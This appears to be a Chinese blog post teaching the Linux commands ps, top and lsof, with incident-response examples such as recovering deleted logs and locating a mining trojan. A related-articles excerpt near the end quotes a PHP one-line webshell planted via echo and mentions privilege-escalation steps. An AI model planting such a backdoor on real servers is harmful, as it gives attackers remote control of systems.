Hacker基础之Linux篇:基础Linux命令九

最新推荐文章于 2023-04-07 17:15:00 发布
最新推荐文章于 2023-04-07 17:15:00 发布
阅读量401 收藏 1
点赞数 1
分类专栏: 【Linux 学习】 # Linux 常用命令

PS

这个命令用于查询当前运行进程的信息,如果是非root用户最好加上sudo来执行~


查询所有正在运行的进程

ps -ef

或者精确一点,查询运行着nginx的进程

ps -ef | grep nginx

以完整的格式显示进程

ps -ajx

top

top命令显示各进程的信息,包括占内存和占CPU的情况


这个命令直接执行就行了

top

lsof

lsof(list open files)是一个列出当前系统打开文件的工具


Linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件


所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口


因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息,因此通过lsof工具能够查看这个列表对系统监测以及排错将是很有帮助的

lsof命令使用介绍:
命令格式:lsof [options] filename
命令功能:列出当前系统打开文件的工具
命令的常用参数选项说明
<filename> 显示开启文件<filename>的进程
-c <name> 显示<name>进程现在打开的文件
-c -p PID 列出进程号为PID的进程所打开的文件
lsof -g GID 显示归属GID的进程情况
+d PATH  显示目录下被进程开启的文件
+D PATH  同上,但是会搜索目录下的目录,时间较长
-d NUM 显示使用fd为NUM的进程
-i 用以显示符合条件的进程情况
-i [4/6] [protocol][@hostname|hostaddr][:service|port]
4/6  IPv4 or IPv6
protocol   TCP or UDP
hostname  Internet host name
hostaddr    IP地址
service   /etc/service中的service name (可以不止一个)
port    端口号 (可以不止一个)

常用的情景如下

1、恢复删除的文件,当你的计算机被黑客攻击之后,黑客离开之前清除了所有的日志,怎么办


例如文件/var/log/messages


我们可以这样做


首先使用lsof来查看当前是否有进程打开/var/logmessages文件

# lsof | grep /var/log/messages 
syslogd 1283 root 2 REG 3,3 5381017 1773647 /var/log/messages (deleted)

从上面的信息可以看到PID 1283(syslogd)打开了文件,而且文件描述符为2


同时还可以看到/var/log/messages已经标记被删除了


因此我们可以在/proc/1283/fd/2fd下的每个以数字命名的文件表示进程对应的文件描述符)中查看相应的信息,如下

# head -n 10 /proc/1283/fd/2 
Aug 4 13:50:15 holmes86 syslogd 1.4.1: restart. 
Aug 4 13:50:15 holmes86 kernel: klogd 1.4.1, log source = /proc/kmsg started. 
Aug 4 13:50:15 holmes86 kernel: Linux version 2.6.22.1-8 (root@everestbuilder.linux-ren.org) (gcc version 4.2.0) #1 SMP Wed Jul 18 11:18:32 EDT 2007 Aug 4 13:50:15 holmes86 kernel: BIOS-provided physical RAM map: Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000000000 - 000000000009f000 (usable) Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000000009f000 - 00000000000a0000 (reserved) Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000100000 - 000000001f7d3800 (usable) Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000001f7d3800 - 0000000020000000 (reserved) Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000e0000000 - 00000000f0007000 (reserved) Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000f0008000 - 00000000f000c000 (reserved)

可以看出文件还在


然后我们可以这样恢复

cat /proc/1283/fd/2 > /var/log/messages

2、显示当前进程打开了哪些文件,比如我们服务器被黑客植入了一个挖矿的木马,假设这个木马的进程号是30297我们怎么去找到这个木马的源文件在哪里,可以这样

lsof -p 30297

3、之后,我们分析这个文件发现了一个恶意域名,为了确定系统中是否还有隐藏木马,我们可以这样查看有哪些进程链接到了这个域名

lsof -i UDP@213162837.yyt.com:1230

或者是TCP

lsof -i TCP@213162837.yyt.com:1230 -r
-r  表示不断的查看
FLy_鹏程万里
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux常用命令汇总
09-22
Linux常用命令汇总,用于初学者学习Linux知识 “Hello everybody out there using minix ---- I’m doing a free operating system” 1991.8,网络上出现了一以该句开头的一个帖子,发帖人就是一个芬兰的Linus ...
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
01-10
作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令。 然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许...
linux内核文件恢复,linux下系统文件恢复
weixin_34929181的博客
04-30 137
当系统中的某个文件被意外地删除了,只要这个时候系统中还有进程正在访问该文件,那么我们就可以通过lsof从/proc目录下恢复该文件的内容。假如由于误操作将/var/log/messages文件删除掉了,那么这时要将/var/log/messages文件恢复的方法如下:首先使用lsof来查看当前是否有进程打开/var/logmessages文件,如下:#lsof|grep/var/log/m...
【黑客】常用linux入侵常用命令,有你不知道的没?
分享Python知识
04-07 647
写个php一句话后门上去:shell浏览目标站不行,命令行下输入ls -la /www.users/来得到交互的Shell,一般的系统都默认安装python输入idbash-3.2$这里uid=529(zeicom)还不是root权限,输入uname –r返回:2.6.18-164.11.1.el5PAELinux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出找对应的exp, 这里地址整理很齐全可以这里下命令输入pwd,这个命令是显示当前目录,先看能不能编译 gcc -help。
Linux For Hacker】————2、基础知识
Fly_鹏程万里
04-15 824
术语&概念 在开始我们的黑客 Linux 基础知识奇妙世界之旅之前,我想介绍几个术语,这些术语应该澄清本章后面讨论的一些概念。二进制文件:此术语是指可以执行的文件,类似于 Windows 中的可执行文件。 二进制文件通常位于/usr/bin 或 usr/sbin 目录中,包括 ps,cat,ls 和 cd 等实用程序(我们将在本章中介绍所有四个)以及无线应用程序黑客工具 aircrack...
10大白帽黑客专用的 Linux 操作系统
linux_shuai的博客
05-09 3054
导读 揭秘十大黑客专用渗透测试的工具的操作系统,这里我把 Kali Linux 列为首位,是因为它在渗透测试中非常流行,它的开发团队 Offensive security 同时也是开发  BackTrack 的团队。我们没有列出  BackTrack ,是因为在它的官方站点上已经无法下载了,它已经被 Kali Linux 所取代了。这里列出的操作系统都是基于 Linux 内核的,它们全都是自由的
黑客常用 Linux 入侵常用命令
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "&lt;?php @eval(\$_POST[md5])?&gt;" &gt;rankuplog_time.php[jobcruit@wa64-054 rankup_l...
linulator:Linux模拟器
02-05
Linulator关于该项目的目标是创建一个伪造Linux环境,该环境具有可打开的可配置网络端口。 Linulator可以用作学习或培训环境,甚至可以用作蜜罐。 作为蜜罐运行时,它有望吸引潜在的攻击者,以便他们可以学习其方法...
黑客入侵Kubernetes集群时包含所有有用工具/命令的列表的容器-Linux开发
05-27
黑客入侵Kubernetes集群时包含所有有用工具/命令的列表的容器黑客入侵Kubernetes集群时具有所有有用工具/命令的列表的容器。 在博客文章...
一次Linux服务器被hack的过程分析
01-31
hacker登入一台被入侵的服务器,通常首先使用”w”命令查看登陆者信息、使用”passwd”命令修改当前用户密码,然后通过wget,获取提权和其他hack工具。hacker一般将工具解压到目录名以”.”开头的目录中,达到隐藏的...
.Linux.Hacker
04-02
Title: Linux Hacker Author: Mr Ajay Kumar Tiwari Length: 136 pages Edition: 1 Language: English Publisher: CreateSpace Independent Publishing Platform Publication Date: 2015-03-29 ISBN-10: 1511502460 ISBN-13: 9781511502467 Linux Command Line Essentials What Linux is and How It Works How to Make the Most of Linux Command Line What hacking is. The truth about hacking What can hacking give you and the dangers that comes with it. The two sides of hacking good vs bad The foundation needed to enter into the hacking lifestyle E Hacking essentials you have to know And Much, much more! Table of Contents Chapter 1: Powerful CD Command Hacks Chapter 2: Date Manipulation Chapter 3: SSH Client Commands Chapter 4: Essential Linux Commands Chapter 5: PS1, PS2, PS3, PS4 and PROMPT_COMMAND Chapter 6: Colorful and Functional Shell Prompt Using PS1 Chapter 7: Archive and Compression Chapter 8: Command Line History Chapter 9: System Administration Tasks Chapter 10: Apachectl and Httpd Examples Chapter 11: Bash Scripting Chapter 12: System Monitoring and Performance
Linux黑客命令行大全
WXN444518的博客
01-27 1344
Linux黑客常用命令命令行 1.系统: # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo # 查看CPU信息 # hostname # 查看计算机名 # env # 查看环境变量 # dmidecode #查看硬件详细信息 2.资源: # free -m # 查看内存使用量和交换...
Linux黑客基础03(分析和管理网络及无线网卡的操作命令
m0_50947684的博客
01-05 1394
Kali Linux分析和管理网络 1.使用ifconfig查看和分析网络(状态) eth0 -第一块有线网卡 wlan0 -第一块无线网卡 PS:网卡的排序是从0开始 ifconfig -a 查看所有接口(活跃和不活跃的) ifconfig eth0 down 禁用eth0网卡 ifconfig eth0 up 启用eth0网卡 2.使用iwconfig 检查无线网卡(设备) ip address show //查看IP地址 -a 3.更改IP地址 1)临时更改 1)ifconfig eth
Hacker基础Linux——基础Linux命令
Fly_鹏程万里
04-18 402
我们继续学习Linux命令mvmv命令是move的缩写,可以用来移动文件或者将文件改名(move (rename) files)。是Linux系统下常用的命令,经常用来备份文件或者目录。mv命令使用介绍: 命令格式:mv [选项] [源文件或目录] [目标文件或目录] 命令功能:视mv命令中第二个参数类型的不同(是目标文件还是目标目录),mv命令将文件重命名或将其移至一个新的目录中。当第二个参数类...
Linux For Hacker】————1、Linux & Hacker
Fly_鹏程万里
04-15 587
前言 黑客是 IT 领域的精英职业。因此,它需要对 IT 概念和技术进行广泛而详细的理解。在最基础的层次上,Linux 是一项需求。如果你想把黑客和信息安全作为你的职业,我强烈建议你投入时间和精力来使用和理解它。 道德黑客 近年来,随着信息安全领域的发展,道德黑客领域也出现了迅猛的发展,也被称为白帽黑客。道德黑客是试图渗透和利用一个系统,以找出其弱点和更好地保护它的实践做法。我将道德黑客分为...
Linux黑客基础
m0_50947684的博客
12-15 3619
Kali Linux了解及有关说明
黑客必备的16个Linux系统发行版
热门推荐
u011977102的专栏
02-17 1万+
黑客必备的16个Linux系统.发行版(黑客专用)一、Kali LinuxKali Linux是由非常受欢迎的Debian派生的Linux发行版,由Offensive Security创建。通常缩写为“卡利”,专为数字取证和渗透测试而设计。这个黑客分发是长期以来一直在推出的“BackTrack”Linux发行版系列之后创作的延续。 二、BackBoxBackBox是一个基于Ubuntu的发行版,用...
一个用于配置移动应用开发环境的自动化脚本
04-17
可以帮助开发者自动安装Android SDK、Android NDK、Java开发工具包(JDK)以及Flutter SDK,这些都是移动应用开发(特别是Android和Flutter应用)所必需的。 脚本首先定义了一些变量,用于存储工具的安装路径和版本。然后,定义了一个install_tool函数,用于检查工具是否已安装,如果没有安装则执行安装命令。 接着,脚本定义了install_android_sdk、install_android_ndk、install_java_jdk、set_java_env和install_flutter_sdk等函数,分别用于安装Android SDK、Android NDK、Java JDK、设置Java环境变量以及安装Flutter SDK。 在主程序部分,脚本按照顺序调用这些函数来安装和配置各个工具。安装完成后,脚本会输出一条消息表示配置已完成。
AI Agent智能应用从0到1定制开发
最新发布
04-17
AI Agent智能应用从0到1定制开发 关键特点: 自动化:AI Agent可以自动执行重复性任务,提高效率并减少人力成本。 智能决策:基于复杂的算法,AI Agent能够进行决策支持,分析数据并提供洞察。 自然语言处理:许多AI Agent具备理解和生成自然语言的能力,使其能够与人类用户进行交流。 机器学习:AI Agent可以利用机器学习技术从经验中学习,不断优化其性能。 个性化:AI Agent能够根据用户的行为和偏好提供个性化的体验。 可扩展性:AI Agent可以设计成模块化,方便扩展新功能或适应不同规模的需求。 实时响应:AI Agent能够提供快速的实时响应,满足紧急任务的需求。
linux c++11 升级
07-27
你可以使用命令`strings /usr/lib/libstdc++.so.6 | grep GLIBCXX`来查看系统中已安装的标准库版本。如果缺少所需的版本,你需要更新或安装相应的标准库版本。 2. 如果你的系统中已经安装了所需的标准库版本,但程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值